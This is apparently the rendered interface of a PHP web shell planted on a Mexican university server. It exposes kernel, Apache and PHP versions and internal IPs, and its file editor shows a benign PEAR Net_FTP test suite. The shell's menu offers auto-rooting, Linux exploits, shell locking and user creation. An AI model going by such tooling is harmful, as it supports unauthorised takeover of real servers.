Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
lib /
php /
test /
Net_FTP /
[ HOME SHELL ]
Name
Size
Permission
Action
AllTests.php
2.29
KB
-rw-r--r--
config.php.dist
307
B
-rw-r--r--
extensions.ini
1.21
KB
-rw-r--r--
Net_FTPTest.php
13.98
KB
-rw-r--r--
testfile.dat
0
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : AllTests.php
<?php /* vim: set expandtab tabstop=4 shiftwidth=4 softtabstop=4: */ /** * Net_FTP test suite file * * To run the tests execute this from the top directory for a CVS checkout * $ pear run-tests -ur * or this if you've installed the package * $ pear run-tests -pu Net_FTP * * PHP version 5 * * LICENSE: This source file is subject to version 3.0 of the PHP license * that is available through the world-wide-web at the following URI: * http://www.php.net/license/3_0.txt. If you did not receive a copy of * the PHP License and are unable to obtain it through the web, please * send a note to license@php.net so we can mail you a copy immediately. * * @category Networking * @package FTP * @author Tobias Schlitt <toby@php.net> * @copyright 1997-2008 The PHP Group * @license http://www.php.net/license/3_0.txt PHP License 3.0 * @version CVS: $Id: AllTests.php,v 1.2.2.3 2008/05/19 18:08:23 jschippers Exp $ * @link http://pear.php.net/package/Net_FTP * @link http://www.phpunit.de PHPUnit * @since File available since Release 0.0.1 */ if (!defined('PHPUnit_MAIN_METHOD')) { define('PHPUnit_MAIN_METHOD', 'Net_FTP_AllTests::main'); } require_once 'PHPUnit/Framework/TestSuite.php'; require_once 'PHPUnit/TextUI/TestRunner.php'; chdir(dirname(__FILE__)); require_once 'Net_FTPTest.php'; /** * Unit test case for Net_FTP * * @category Networking * @package FTP * @author Jorrit Schippers <jschippers@php.net> * @copyright 1997-2008 The PHP Group * @license http://www.php.net/license/3_0.txt PHP License 3.0 * @version Release: 1.3.7 * @link http://pear.php.net/package/Net_FTP * @since Class available since Release 1.3.3 */ class Net_FTP_AllTests { /** * Main test suite run method * * @return void */ public static function main() { PHPUnit_TextUI_TestRunner::run(self::suite()); } /** * Main test suite method * * @return void */ public static function suite() { $suite = new PHPUnit_Framework_TestSuite('Net_FTP Tests'); $suite->addTestSuite('Net_FTPTest'); return $suite; } } if (PHPUnit_MAIN_METHOD == 'Net_FTP_AllTests::main') { Net_FTP_AllTests::main(); } ?>
Close